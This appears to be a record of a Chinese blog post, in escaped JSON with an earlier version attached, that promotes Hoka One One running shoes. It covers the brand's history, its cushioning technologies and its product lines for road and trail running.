\n\u8d8a\u91ce\u8dd1\u3001\u94c1\u4eba\u4e09\u9879\u3001\u9a6c\u62c9\u677e\uff0c\u4ee5\u53ca\u66f4\u8650\u66f4\u53d8\u6001\u7684\u8010\u529b\u8dd1\u6bd4\u8d5b\u4e2d\uff0c\u90fd\u4e0d\u65ad\u51fa\u73b0\u7a7f\u7740HokaOneOne\u7684\u9009\u624b\u3002\u8d8a\u6765\u8d8a\u591a\u767b\u4e0a\u9886\u5956\u53f0\u7684\u9009\u624b\u9009\u62e9HokaOneOne\uff0c\u4e00\u4e2a\u53ea\u6709\u65d7\u8230\u7ea7\u4ea7\u54c1\u7684\u54c1\u724c\uff0c\u4e00\u4e2a\u6bcf\u6b3e\u4ea7\u54c1\u90fd\u80fd\u72ec\u5f53\u4e00\u9762\u7684\u54c1\u724c\uff0c\u4e00\u4e2a\u88ab\u8a89\u4e3a\u8dd1\u754c\u8def\u864e\u7684\u54c1\u724c\u3002...\n\n \n\u5728\u8d64\u8db3\u8dd1\u6d41\u884c\u7684\u4e24\u5e74\u524d\uff0c\u4e94\u6307\u3001\u88f8\u8db3\u30010\u843d\u5dee\u3001\u8584\u5e95\u7684\u8dd1\u978b\u53ef\u706b\u5566\uff0c\u5d07\u5c1a\u81ea\u7136\u7684\uff0c\u5229\u7528\u80a2\u4f53\u529b\u91cf\u5e26\u6765\u7684\u7f13\u51b2\u4f5c\u7528\u8fdb\u884c\u8fd0\u52a8\uff0c\u5f53\u65f6\u7684\u963f\u8fea\u3001\u8010\u514b\u3001\u7ebd\u5df4\u4f26\u90fd\u88ab\u8fd9\u79cd\u8d8b\u52bf\u7275\u7740\u9f3b\u5b50\u505a\u8dd1\u978b\u3002\n\n \n \n\u5947\u602a\u8dd1\u978b\u706b\u4e86\n \n\u4e0d\u8fc7\u6709\u8fd9\u4e48\u4e00\u5bb6\u540d\u5b57\u5947\u602a\uff0c\u53eb Hoka One One \u7684\u5c0f\u5382\u5546\uff0c\u4e00\u53cd\u5e38\u6001\u7684\u8ddf\u6d41\u884c\u8d8b\u52bf\u5bf9\u7740\u5e72\u3002\u5728\u88f8\u8db3\u5954\u8dd1\u76db\u884c\u7684\u5e74\u4ee3\uff0c\u5f00\u59cb\u8015\u8018\u539a\u5e95\u5f3a\u7f13\u9707\u8dd1\u978b\u3002\n\n \n\u636e\u8bf4\u5176\u521b\u59cb\u4eba\u8dd1\u5230\u4e2d\u56fd\u627e\u5316\u5b66\u5bb6\u4e13\u95e8\u7814\u53d1\u4e86\u4e00\u79cd\u8f7b\u8d28\u53c8\u7f13\u9707\u7684\u6ce1\u6cab\u6750\u8d28\u3002\u5229\u7528\u8fd9\u79cd\u6750\u8d28\u4f5c\u4e3a\u4e2d\u5e95\uff0c\u751f\u4ea7\u51fa\u53c8\u5927\u53c8\u7f13\u9707\u7684\u8d85\u7ea7\u8d8a\u91ce\u8dd1\u978b\uff0c\u7b80\u76f4\u662f\u8dd1\u978b\u754c\u7684\u8def\u864e\u3002\u200b\n\n \n\u4e0e\u5176\u5b83\u8dd1\u978b\u6bd4\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u5b83\u6709\u591a\u5927\u591a\u539a\u4e86\u3002\u200b\n\n\nHoka One One \u662f\u6bdb\u5229\u8bed\uff0c\u76f8\u5f53\u4e8e\u201cTo fly\u201d\u7684\u610f\u601d\uff0c\u7ffb\u8bd1\u6210\u4e2d\u6587\u610f\u601d\u662f\u201c\u522b\u62e6\u7740\u6211\uff0c\u6211\u8981\u4e0a\u5929\u201d\u3002\u200b\n\n\u200b\n\u591a\u6570\u6162\u8dd1\u978b\u7684\u9876\u7ea7\u8ddf\u6b21\u9876\u7ea7\u7684\u5dee\u522b\u4ec5\u4ec5\u662f\u5728\u9876\u7ea7\u8dd1\u978b\u52a0\u5165\u66f4\u591a\u7f13\u9707\u6280\u672f\uff0c\u6765\u9002\u5e94\u5927\u4f53\u91cd\u7684\u7528\u6237\uff0c\u5178\u578b\u4f8b\u5b50\u5c31\u662f\u4e9a\u745f\u58eb\u7684\u9876\u7ea7 Kayano \u4e0e\u6b21\u9876\u7ea7 GT \u7cfb\u5217\u3002\u200b\n\n\u200bAsics GT-2000\n \n2013\u5e74\uff0c\u8a93\u628a\u7f13\u9707\u505a\u5230\u6781\u81f4\u7684 Hoka One One \u88ab Deckers \u516c\u53f8\u76f8\u4e2d\u5e76\u4e14\u6536\u8d2d\uff0c\u8fd9\u5bb6\u516c\u53f8\u540c\u6837\u662f UGG \u7684\u6bcd\u516c\u53f8\u3002\u6709\u6ca1\u6709\u5f88\u671f\u5f85\u4e4b\u540e\u53d1\u751f\u7684\u4e8b\u3002\n\n\u636e\u8bf4UGG\u978b\u5e95\u7528\u4e86Hoka\u6280\u672f\n \n\u90a3\u65f6\u5019\uff0cHoka One One \u53ea\u670990\u4e2a\u5e97\u9762\uff0c\u88ab\u6536\u8d2d\u4e4b\u540e\u8fd9\u602a\u7269\u8dd1\u978b\u5c31\u8fc5\u901f\u6d41\u884c\u8d77\u6765\uff0c\u4e24\u5e74\u4e4b\u5185\u5c31\u5f00\u4e861200\u4e2a\u5e97\u9762\u3002\n\n \n \n\u8f6f\u5230\u50cf\u8e29\u7740\u201c\u5927\u767d\u201d\u8dd1\u6b65\nHoka One One \u4e00\u95e8\u5fc3\u601d\u505a\u539a\u539a\u7684\u8dd1\u6b65\u978b\uff0c\u8fd9\u79cd\u978b\u7a7f\u8d77\u6765\u50cf\u8e29\u5728\u677e\u7cd5\u4e0a\u7684\u611f\u89c9\uff0c\u7279\u522b\u9002\u5408\u4e0a\u767e\u751a\u81f3\u51e0\u767e\u516c\u91cc\u7684\u8d85\u7ea7\u9a6c\u62c9\u677e\u7b49\u957f\u8ddd\u79bb\u8fd0\u52a8\u3002\n\n\n\u5bf9\u4e8e\u8fd9\u4e9b\u8ddd\u79bb\u957f\u5230\u5feb\u8981\u903c\u8fd1\u4f60\u6781\u9650\u7684\u5954\u8dd1\uff0c\u7a7f Hoka One One \u8dd1\u978b\u80fd\u5e26\u7ed9\u4f60\u65e0\u654c\u7684\u8212\u9002\u611f\u3002\n\n\u200b\n\u9664\u4e86\u9488\u5bf9\u9a6c\u62c9\u677e\u8d5b\u4e8b\u8fd9\u79cd\u516c\u8def\u8dd1\u4ea7\u54c1\u4e4b\u5916\uff0cHoka OneOne \u8fd8\u5728\u7814\u53d1\u8d8a\u91ce\u8dd1\u7cfb\u5217\uff0c\u5e26\u4f60\u5c3d\u60c5\u7ffb\u5c71\u8d8a\u5cad\u3002\u200b\n\n\u200b\n\u5176\u5b9e\uff0c\u6700\u521d\u7684\u4ea7\u54c1\u5c31\u662f\u4e3a\u4e86\u5e94\u5bf9\u4e0b\u5c71\u8fd9\u79cd\u5de8\u4f24\u819d\u76d6\u7684\u8fd0\u52a8\u3002\u200b\n\n\u200b\n\u8f7b\u8f7b\u7684 Hoka One One \u53ef\u4ee5\u80cc\u5728\u5305\u91cc\uff0c\u4e0b\u5c71\u65f6\u6362\u4e0a\uff0c\u5c31\u4e0d\u5fc5\u62c5\u5fc3\u4f60\u7684\u819d\u76d6\u53d7\u635f\u4e86\u3002\u200b\n\n\u200b\n\u60f3\u8c61\u4e00\u4e0b\u8e29\u7740\u5927\u767d\u7684\u611f\u89c9\u3002\n\n\u200b\n\u8fd9\u6837\u4f18\u79c0\u7684\u8dd1\u978b\u4e0d\u51fa\u6240\u6599\u7684\u8fc5\u901f\u5360\u9886\u4e86\u5404\u5927\u8dd1\u978b\u6392\u884c\u699c\u5355\u3002\u5728\u6700\u8457\u540d\u7684\u300a\u8dd1\u8005\u4e16\u754c\u300b\u63a8\u8350\u699c\u5355\u91cc\u7ecf\u5e38\u51fa\u73b0\u5b83\u7684\u8eab\u5f71\u3002\n\n \n\u6bd4\u5982 Hoka One One Tracer \u662f\u672c\u5e74\u5ea6\u6625\u5b63\u8dd1\u978b\u63a8\u8350\u4e2d\u6700\u8f7b\u91cf\u7684\u8dd1\u978b\u4e4b\u4e00\u3002\n\nHoka One One Tracer\n \n\u300a\u8dd1\u8005\u4e16\u754c\u300b\u6bcf\u5e74\u90fd\u4f1a\u53ec\u96c6\u5168\u7f8e\u7684\u6210\u767e\u4e0a\u5343\u540d\u6d4b\u8bd5\u8005\u5bf9\u5404\u79cd\u8dd1\u978b\u8fdb\u884c\u6d4b\u8bd5\u5e76\u7ed9\u51fa\u516c\u6b63\u5ba2\u89c2\u7684\u8bc4\u5206\uff0c\u7ed3\u5408\u8bc4\u5206\u548c\u5b9e\u9645\u811a\u611f\u7ed9\u51fa\u63a8\u8350\u3002\u200b\n\n\u200b\n\u6211\u5728\u770b\u5230\u300a\u8dd1\u8005\u4e16\u754c\u300b\u5bf9 Hoka One One Conquest \u516c\u8def\u8dd1\u978b\u7684\u6d4b\u8bd5\u5206\u6570\u65f6\uff0c\u5168\u8eab\u6253\u4e86\u4e2a\u5bd2\u98a4\uff0c\u6211\u548c\u6211\u7684\u5c0f\u4f19\u4f34\u90fd\u60ca\u5446\u4e86\uff01\n\n \n\u524d\u638c\u7f13\u9707\u3001\u540e\u8ddf\u7f13\u9707\u3001\u521a\u5ea6\u8bc4\u5206\u51e0\u4e4e\u90fd\u8981\u6ee1\u5206\u7206\u8868\uff0c\u8fd9\u662f\u5728\u9020\u978b\u4e48\uff0c\u7b80\u76f4\u662f\u5728\u9020\u7b4b\u6597\u4e91\u561b\uff01\n\n \n \n \n \n\u8fd9\u8dd1\u978b\u6280\u672f\u6211\u7ed9\u6ee1\u5206\nNo.1\uff5c\u4e2d\u4f4e\u6280\u672f\n \n\u4e2d\u5e95\u7684\u6ce1\u6cab\u5bc6\u5ea6\u6bd4\u4f20\u7edf\u7684\u978b\u4f4e\u4e86 30% \u4f46\u662f\u6ce1\u6cab\u7528\u91cf\u591a\u51fa\u4e861.5\u500d\u3002\n\n \n\u9ad8\u56de\u5f39\u548c\u8db3\u5e95\u53cd\u9988\u80fd\u7ed9\u8dd1\u8005\u63d0\u4f9b\u66f4\u591a\u5f39\u529b\u3002\u6bd4\u666e\u901a\u8dd1\u978b\u591a\u4e00\u5c42\u8f6f\u57ab\uff0c\u53ef\u4ee5\u51cf\u7f13\u5927\u7ea680%\u7684\u51b2\u51fb\u529b\u3002\n\n \n \nNo.2\uff5c\u8239\u578b\u8bbe\u8ba1\n \nHoka One One \u628a\u978b\u5e95\u8bbe\u8ba1\u6210\u4e86\u8239\u5f62\uff0c\u5178\u578b\u7684\u4e24\u79cd\u978b\u5e95\u843d\u5dee\uff1a\u5206\u522b\u662f\u540e\u8ddf 35mm \u524d\u638c 31mm\uff1b\u548c\u540e\u8ddf 30mm \u524d\u638c 24mm\u3002\n\n\n\u8fd9\u79cd\u9ad8\u5ea6\u5dee\u80fd\u591f\u7ed9\u8dd1\u8005\u5e26\u6765\u7279\u522b\u6d41\u7545\u7684\u8dd1\u6b65\u611f\u53d7\uff0c\u5c31\u50cf\u8e29\u7740\u6447\u6905\u4e00\u6837\uff0c\u8dd1\u8d77\u6765\u8f7b\u677e\u7701\u529b\uff0c\u80fd\u591f\u51cf\u8f7b 20% \u7684\u819d\u76d6\u538b\u529b\u3002\n\n \n \nNo.3\uff5cRMAT \u4e2d\u5e95\n\nRMAT \u6280\u672f\u662f Hoka \u5bb6\u7684\u6700\u65b0\u7684\u6280\u672f\uff0c\u5c06\u5f39\u6027\u548c\u575a\u56fa\u6027\u76f8\u7ed3\u5408\uff0c\u540c\u65f6\u8fd8\u80fd\u914d\u5408\u5927\u5e95\u63d0\u4f9b\u4e00\u5b9a\u7684\u6293\u5730\u6027\u80fd\u3002\u6bd4\u4e00\u822c EVA \u6280\u672f\u4e2d\u5e95\u8f7b 30%\u3002\u800c\u4e14\u66f4\u8f6f\u7f13\u51b2\u66f4\u597d\u3002\n\n \n\u6709\u4e86\u8fd9\u4e2a\u4e2d\u5e95\u80fd\u591f\u8ba9\u4f60\u811a\u80fd\u66f4\u597d\u7684\u63a7\u5236\u8dd1\u978b\uff0c\u80fd\u5728\u4e0d\u540c\u5730\u5f62\u8dd1\u7684\u66f4\u5feb\uff0c\u66f4\u8f7b\u677e\uff0c\u66f4\u5b89\u5168\u3002\n\n \n \nNo.4\uff5c\u589e\u5f3a\u5916\u5e95\n\nHoka OneOne \u6bd4\u5e73\u5e38\u7684\u978b\u591a\u52a0\u4e86 50% \u7684\u5916\u5e95\uff0c\u9488\u5bf9\u5982\u6b64\u539a\u7684\u4e2d\u5e95\uff0c\u5927\u5e95\u91c7\u7528\u4e86\u5927\u91cf\u6c9f\u58d1\u51f9\u51f8\u8bbe\u8ba1\uff0c\u6765\u63d0\u9ad8\u6293\u5730\u529b\u3002\u540c\u65f6\u978b\u5e95\u7684\u4e0d\u540c\u5206\u533a\uff0c\u4fdd\u8bc1\u7075\u6d3b\u7684\u540c\u65f6\u4e0d\u727a\u7272\u7a33\u5b9a\u6027\u3002\u4e0d\u8fc7\u5373\u4fbf\u5982\u6b64\uff0c\u5916\u5730\u7684\u6297\u78e8\u635f\u6027\u80fd\u4e5f\u4e0d\u662f\u7279\u522b\u597d\uff0c\u5bb9\u6613\u6d88\u8017\u3002\n\n \n \nNo.5\uff5c\u901f\u5ea6\u978b\u57ab\n\n\u8bb8\u591a\u6b3e\u8dd1\u978b\u90fd\u63d0\u4f9b\u4e86\u4e24\u7ec4\u978b\u57ab\uff0c\u5851\u5f62\u7684\u901f\u5ea6\u978b\u57ab\u548c\u88c1\u65ad\u978b\u57ab\u3002\u901f\u5ea6\u978b\u57ab\u91c7\u75283\u5c42\u63a5\u5408\u6280\u672f\u8ba9\u978b\u57ab\u4fdd\u62a4\u811a\u66f4\u5b89\u5168\u3002\u5e76\u8ba9\u811a\u638c\u66f4\u52a0\u8d34\u5408\u4e2d\u5e95\uff0c\u4fdd\u8bc1\u6700\u4f73\u811a\u611f\u3002\n\n \n\u88c1\u65ad\u978b\u57ab\u4f7f\u7528\u4e86\u201cOrthoLite\"\u79d1\u6280\uff0c\u8f7b\u91cf\u3001\u9632\u81ed\u3002\u5728\u957f\u9014\u8fd0\u52a8\u811a\u53d8\u80bf\u80c0\u4e4b\u540e\uff0c\u53ef\u4ee5\u6362\u66f4\u8f7b\u8584\u7684\u88c1\u65ad\u978b\u57ab\uff0c\u53ef\u4ee5\u63d0\u9ad8\u66f4\u5bbd\u655e\u7684\u978b\u5185\u7a7a\u95f4\u3002\n\n \n \nNo.6\uff5c\u5feb\u901f\u978b\u5e26\n\n\u540c\u6837\uff0c\u591a\u6b3e\u8dd1\u978b\u4e5f\u914d\u5907\u4e86\u5feb\u901f\u978b\u5e26\u7cfb\u7edf\u548c\u666e\u901a\u978b\u5e26\uff0c\u4e00\u6309\u4e00\u62c9\u5c31\u53ef\u4ee5\u7cfb\u4e0a\u978b\u5e26\u3002\u65b9\u4fbf\u5728\u8fd0\u52a8\u65f6\u6362\u978b\u6216\u8005\u6362\u889c\u5b50\u3002\u5f53\u7136\uff0c\u4f60\u4e5f\u53ef\u4ee5\u6362\u4e0a\u666e\u901a\u978b\u5e26\uff0c\u628a\u978b\u5e26\u7cfb\u7684\u66f4\u7ed3\u5b9e\u3002\n\n\n\u5e76\u4e14\u978b\u5b50\u4e0a\u6709\u52a0\u5bbd\u7684\u56fa\u5b9a\u978b\u53e3\uff0c\u63d0\u4f9b\u5305\u88f9\u6027\u4e4b\u5916\uff0c\u8fd8\u80fd\u56fa\u5b9a\u978b\u5e26\u3002\n\n \n \nNo.7\uff5c\u201c\u8d85\u7ea4\u201d\u6750\u6599\u978b\u820c\n\n\u978b\u820c\u91c7\u7528\u4e86\u201c\u8d85\u7ea4\u201d\u6750\u6599\u5236\u6210\uff0c\u8fd9\u79cd\u6750\u6599\u900f\u6c14\u67d4\u8f6f\uff0c\u5e76\u4e14\u5728\u978b\u820c\u4e0a\u7684\u900f\u6c14\u5b54\uff0c\u53ef\u4ee5\u4fdd\u8bc1\u978b\u5b50\u7684\u900f\u6c14\u6027\u3002\n\n \n \n \n\u8be5\u4e70\u54ea\u6b3eHoka One One\n\u54ea\u79cd\u978b\u5b50\u66f4\u9002\u5408\u4f60\uff1f\u4e0d\u540c\u7684\u6218\u51b5\uff0c\u91c7\u53d6\u4e0d\u540c\u7684\u5175\u5203\uff0c\u5927\u4f53\u4ee5\u5206\u8fd94\u7c7b\uff1a\n \n\u6ce8\uff1a\n1. \u70b9\u56fe\u7247\u53ef\u770b\u7f8e\u56fd\u4ef7\u683c\uff0c\u5982\u9700\u4ee3\u8d2d\u8bf7\u8054\u7cfb\u5fae\u4fe1kk794388\uff0c\u4ef7\u683c\u4ece\u4f18\n2. \u4e00\u6b3e\u978b\u5b50\u53ef\u80fd\u6709\u5f88\u591a\u79cd\u989c\u8272\/\u5c3a\u5bf8\u7ec4\u5408\uff0c\u9700\u70b9\u5165\u67e5\u770b\uff0c\u56fe\u7247\u53ea\u4f9b\u53c2\u8003\n3. \u5173\u4e8e\u7f8e\u56fd\u978b\u7801\u7684\u9009\u62e9\uff0c\u8bf7\u53c2\u8003\u6d77\u6dd8\u978b\u5b50\u5c3a\u7801\n \n \n\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\uff0c\u9762\u5411\u6240\u6709\u5730\u5f62\u548c\u4e0d\u540c\u8def\u51b5\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\u548c\u4fdd\u62a4\uff0c\u4f18\u5f02\u7684\u901a\u8fc7\u6027\uff0c\u5728\u957f\u8ddd\u79bb\u8010\u529b\u8d5b\u4e2d\uff0c\u65e0\u4e0e\u4f26\u6bd4\u7684\u8212\u9002\u6027\uff0c\u660e\u663e\u63d0\u5347\u4e86\u8dd1\u8005\u7684\u8010\u529b\u548c\u6210\u7ee9\u3002ATR\u7cfb\u8d8a\u91ce\u8dd1\u978b\uff0c\u4e00\u76f4\u53d7\u5165\u95e8\u7ea7\u8d8a\u91ce\u8dd1\u8005\u548c\u8d85\u7ea7\u8d8a\u91ce\u8d5b\u5927\u795e\u7684\u8ffd\u6367\u3002\n \n\n \n \n\u8f7b\u91cf\u5316\u8d8a\u91ce\u8dd1\u978b\uff0c\u9762\u5411\u8ffd\u6c42\u901f\u5ea6\u548c\u7ade\u6280\u7ea7\u5927\u795e\u7684\u4ea7\u7269\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\uff0c\u6bd4\u8def\u8dd1\u978b\u8fd8\u8f7b\u7684\u91cd\u91cf\uff0c\u7edd\u5bf9\u662f\u5927\u795e\u7ea7\u7684\u4e0b\u5761\u795e\u5668\u3002\u7a7f\u7740Hoka One One\u7684\u5927\u795e\u4e00\u6b21\u53c8\u4e00\u6b21\u767b\u4e0a\u5404\u5927\u8d5b\u4e8b\u7684\u9886\u5956\u53f0\u7edd\u975e\u5076\u7136\u3002\n\n \n \n \n \n\u8d8a\u91ce\u8dd1\/\u8def\u8dd1\u4e24\u7528\u8dd1\u978b\uff0c\u9762\u5411\u57ce\u5e02\u8d8a\u91ce\u8dd1\uff0c\u65e2\u6ee1\u8db3\u65e5\u5e38\u6162\u8dd1\u8bad\u7ec3\u9700\u8981\uff0c\u53c8\u80fd\u4e0a\u5c71\u5954\u8dd1\u3002\u4e0e\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\u7684\u533a\u522b\u5728\u4e8e\uff0c\u4e24\u7528\u8dd1\u978b\u7684\u978b\u5e95\u4e0d\u4ec5\u66f4\u9002\u5408\u5728\u786c\u5316\u8def\u9762\u98de\u5954\uff0c\u800c\u4e14\u5728\u786c\u5316\u8def\u9762\u4e0a\u7684\u8010\u78e8\u8868\u73b0\u66f4\u4f18\u79c0\u3002\u4e0d\u8fc7\u5728\u590d\u6742\u8d8a\u91ce\u6280\u672f\u8def\u6bb5\u4e0a\u7684\u8868\u73b0\u4f1a\u900a\u8272\u4e8e\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\u3002\n\n \n \n \n\u957f\u8ddd\u79bb\u516c\u8def\u8dd1\u978b\uff0c\u9762\u5411\u957f\u8ddd\u79bb\u7684\u9a6c\u62c9\u677e\u548c\u8def\u8dd1\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\uff0c\u8f7b\u91cf\u5316\u8bbe\u8ba1\uff0c\u65e0\u8bba\u662f\u5165\u95e8\u7ea7\u8dd1\u8005\uff0c\u8fd8\u662f\u4e89\u5206\u593a\u79d2\u7684\u9a6c\u62c9\u677e\u8fbe\u4eba\uff0c\u90fd\u4e0d\u4f1a\u62d2\u7edd\u65e2\u8f7b\u91cf\u5316\uff0c\u53c8\u4e0d\u5931\u7f13\u51b2\u548c\u56de\u5f39\u529b\u5f3a\u7684\u8dd1\u6b65\u795e\u5668\u3002\n\n \n \n \n \n \n \n \n \n \n\u53c2\u8003\uff1a\n- Wikipedia\n- Sole Man: The Story Behind Hoka Shoes\n\n\n\n\n\n","old_contents":"= Hoka One One\n:hp-image: https:\/\/cloud.githubusercontent.com\/assets\/19504323\/15452702\/48719838-202c-11e6-9c52-3d13d17bc909.jpg\n:published_at: 2015-11-11\n:hp-tags: Hoka, Hoka One One, Maximalist, \u8dd1\u6b65, \u8dd1\u978b, \u8fd0\u52a8\u978b, \u7f13\u9707, \u4fdd\u62a4, \u6d77\u6dd8, \u4e9a\u9a6c\u900a,\n\n\u5e02\u9762\u4e0a\u7684\u8fd0\u52a8\u978b\u53ef\u4ee5\u8bf4\u4e94\u82b1\u516b\u95e8\uff0c\u4f46\u9009\u62e9\u8d8a\u591a\uff0c\u8d8a\u96be\u9009\u62e9\u3002\u8fd9\u91cc\u6211\u4e3a\u5927\u5bb6\u63a8\u8350\u4e00\u4e2a\u724c\u5b50\uff0c\u53ebHoka One One\u3002\n \n\u8fd9\u662f\u4e00\u4e2a\u6781\u5c0f\u4f17\u7684\u724c\u5b50\uff0c\u4f46\u5b83\u7684\u978b\u5b50\u7edd\u5bf9\u662f\u6211\u7a7f\u8fc7\u6700\u8212\u670d\u7684\uff0c\u53ef\u4ee5\u8bf4\u79d2\u6740Asics, NB, Mizuno, Saucony\u7b49\u4e00\u4f17\u9876\u7ea7\u8fd0\u52a8\u978b\u54c1\u724c\u3002\n \n\u662f\u4ec0\u4e48\u8ba9Hoka\u5982\u6b64\u5f3a\u5927\uff1f\n \n\u8d8a\u91ce\u8dd1\u3001\u94c1\u4eba\u4e09\u9879\u3001\u9a6c\u62c9\u677e\uff0c\u4ee5\u53ca\u66f4\u8650\u66f4\u53d8\u6001\u7684\u8010\u529b\u8dd1\u6bd4\u8d5b\u4e2d\uff0c\u90fd\u4e0d\u65ad\u51fa\u73b0\u7a7f\u7740HokaOneOne\u7684\u9009\u624b\u3002\u8d8a\u6765\u8d8a\u591a\u767b\u4e0a\u9886\u5956\u53f0\u7684\u9009\u624b\u9009\u62e9HokaOneOne\uff0c\u4e00\u4e2a\u53ea\u6709\u65d7\u8230\u7ea7\u4ea7\u54c1\u7684\u54c1\u724c\uff0c\u4e00\u4e2a\u6bcf\u6b3e\u4ea7\u54c1\u90fd\u80fd\u72ec\u5f53\u4e00\u9762\u7684\u54c1\u724c\uff0c\u4e00\u4e2a\u88ab\u8a89\u4e3a\u8dd1\u754c\u8def\u864e\u7684\u54c1\u724c\u3002...\n\n \n\u5728\u8d64\u8db3\u8dd1\u6d41\u884c\u7684\u4e24\u5e74\u524d\uff0c\u4e94\u6307\u3001\u88f8\u8db3\u30010\u843d\u5dee\u3001\u8584\u5e95\u7684\u8dd1\u978b\u53ef\u706b\u5566\uff0c\u5d07\u5c1a\u81ea\u7136\u7684\uff0c\u5229\u7528\u80a2\u4f53\u529b\u91cf\u5e26\u6765\u7684\u7f13\u51b2\u4f5c\u7528\u8fdb\u884c\u8fd0\u52a8\uff0c\u5f53\u65f6\u7684\u963f\u8fea\u3001\u8010\u514b\u3001\u7ebd\u5df4\u4f26\u90fd\u88ab\u8fd9\u79cd\u8d8b\u52bf\u7275\u7740\u9f3b\u5b50\u505a\u8dd1\u978b\u3002\n\n \n \n\u5947\u602a\u8dd1\u978b\u706b\u4e86\n \n\u4e0d\u8fc7\u6709\u8fd9\u4e48\u4e00\u5bb6\u540d\u5b57\u5947\u602a\uff0c\u53eb Hoka One One \u7684\u5c0f\u5382\u5546\uff0c\u4e00\u53cd\u5e38\u6001\u7684\u8ddf\u6d41\u884c\u8d8b\u52bf\u5bf9\u7740\u5e72\u3002\u5728\u88f8\u8db3\u5954\u8dd1\u76db\u884c\u7684\u5e74\u4ee3\uff0c\u5f00\u59cb\u8015\u8018\u539a\u5e95\u5f3a\u7f13\u9707\u8dd1\u978b\u3002\n\n \n\u636e\u8bf4\u5176\u521b\u59cb\u4eba\u8dd1\u5230\u4e2d\u56fd\u627e\u5316\u5b66\u5bb6\u4e13\u95e8\u7814\u53d1\u4e86\u4e00\u79cd\u8f7b\u8d28\u53c8\u7f13\u9707\u7684\u6ce1\u6cab\u6750\u8d28\u3002\u5229\u7528\u8fd9\u79cd\u6750\u8d28\u4f5c\u4e3a\u4e2d\u5e95\uff0c\u751f\u4ea7\u51fa\u53c8\u5927\u53c8\u7f13\u9707\u7684\u8d85\u7ea7\u8d8a\u91ce\u8dd1\u978b\uff0c\u7b80\u76f4\u662f\u8dd1\u978b\u754c\u7684\u8def\u864e\u3002\u200b\n\n \n\u4e0e\u5176\u5b83\u8dd1\u978b\u6bd4\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u5b83\u6709\u591a\u5927\u591a\u539a\u4e86\u3002\u200b\n\n\nHoka One One \u662f\u6bdb\u5229\u8bed\uff0c\u76f8\u5f53\u4e8e\u201cTo fly\u201d\u7684\u610f\u601d\uff0c\u7ffb\u8bd1\u6210\u4e2d\u6587\u610f\u601d\u662f\u201c\u522b\u62e6\u7740\u6211\uff0c\u6211\u8981\u4e0a\u5929\u201d\u3002\u200b\n\n\u200b\n\u591a\u6570\u6162\u8dd1\u978b\u7684\u9876\u7ea7\u8ddf\u6b21\u9876\u7ea7\u7684\u5dee\u522b\u4ec5\u4ec5\u662f\u5728\u9876\u7ea7\u8dd1\u978b\u52a0\u5165\u66f4\u591a\u7f13\u9707\u6280\u672f\uff0c\u6765\u9002\u5e94\u5927\u4f53\u91cd\u7684\u7528\u6237\uff0c\u5178\u578b\u4f8b\u5b50\u5c31\u662f\u4e9a\u745f\u58eb\u7684\u9876\u7ea7 Kayano \u4e0e\u6b21\u9876\u7ea7 GT \u7cfb\u5217\u3002\u200b\n\n\u200bAsics GT-2000\n \n2013\u5e74\uff0c\u8a93\u628a\u7f13\u9707\u505a\u5230\u6781\u81f4\u7684 Hoka One One \u88ab Deckers \u516c\u53f8\u76f8\u4e2d\u5e76\u4e14\u6536\u8d2d\uff0c\u8fd9\u5bb6\u516c\u53f8\u540c\u6837\u662f UGG \u7684\u6bcd\u516c\u53f8\u3002\u6709\u6ca1\u6709\u5f88\u671f\u5f85\u4e4b\u540e\u53d1\u751f\u7684\u4e8b\u3002\n\n\u636e\u8bf4UGG\u978b\u5e95\u7528\u4e86Hoka\u6280\u672f\n \n\u90a3\u65f6\u5019\uff0cHoka One One \u53ea\u670990\u4e2a\u5e97\u9762\uff0c\u88ab\u6536\u8d2d\u4e4b\u540e\u8fd9\u602a\u7269\u8dd1\u978b\u5c31\u8fc5\u901f\u6d41\u884c\u8d77\u6765\uff0c\u4e24\u5e74\u4e4b\u5185\u5c31\u5f00\u4e861200\u4e2a\u5e97\u9762\u3002\n\n \n \n\u8f6f\u5230\u50cf\u8e29\u7740\u201c\u5927\u767d\u201d\u8dd1\u6b65\nHoka One One \u4e00\u95e8\u5fc3\u601d\u505a\u539a\u539a\u7684\u8dd1\u6b65\u978b\uff0c\u8fd9\u79cd\u978b\u7a7f\u8d77\u6765\u50cf\u8e29\u5728\u677e\u7cd5\u4e0a\u7684\u611f\u89c9\uff0c\u7279\u522b\u9002\u5408\u4e0a\u767e\u751a\u81f3\u51e0\u767e\u516c\u91cc\u7684\u8d85\u7ea7\u9a6c\u62c9\u677e\u7b49\u957f\u8ddd\u79bb\u8fd0\u52a8\u3002\n\n\n\u5bf9\u4e8e\u8fd9\u4e9b\u8ddd\u79bb\u957f\u5230\u5feb\u8981\u903c\u8fd1\u4f60\u6781\u9650\u7684\u5954\u8dd1\uff0c\u7a7f Hoka One One \u8dd1\u978b\u80fd\u5e26\u7ed9\u4f60\u65e0\u654c\u7684\u8212\u9002\u611f\u3002\n\n\u200b\n\u9664\u4e86\u9488\u5bf9\u9a6c\u62c9\u677e\u8d5b\u4e8b\u8fd9\u79cd\u516c\u8def\u8dd1\u4ea7\u54c1\u4e4b\u5916\uff0cHoka OneOne \u8fd8\u5728\u7814\u53d1\u8d8a\u91ce\u8dd1\u7cfb\u5217\uff0c\u5e26\u4f60\u5c3d\u60c5\u7ffb\u5c71\u8d8a\u5cad\u3002\u200b\n\n\u200b\n\u5176\u5b9e\uff0c\u6700\u521d\u7684\u4ea7\u54c1\u5c31\u662f\u4e3a\u4e86\u5e94\u5bf9\u4e0b\u5c71\u8fd9\u79cd\u5de8\u4f24\u819d\u76d6\u7684\u8fd0\u52a8\u3002\u200b\n\n\u200b\n\u8f7b\u8f7b\u7684 Hoka One One 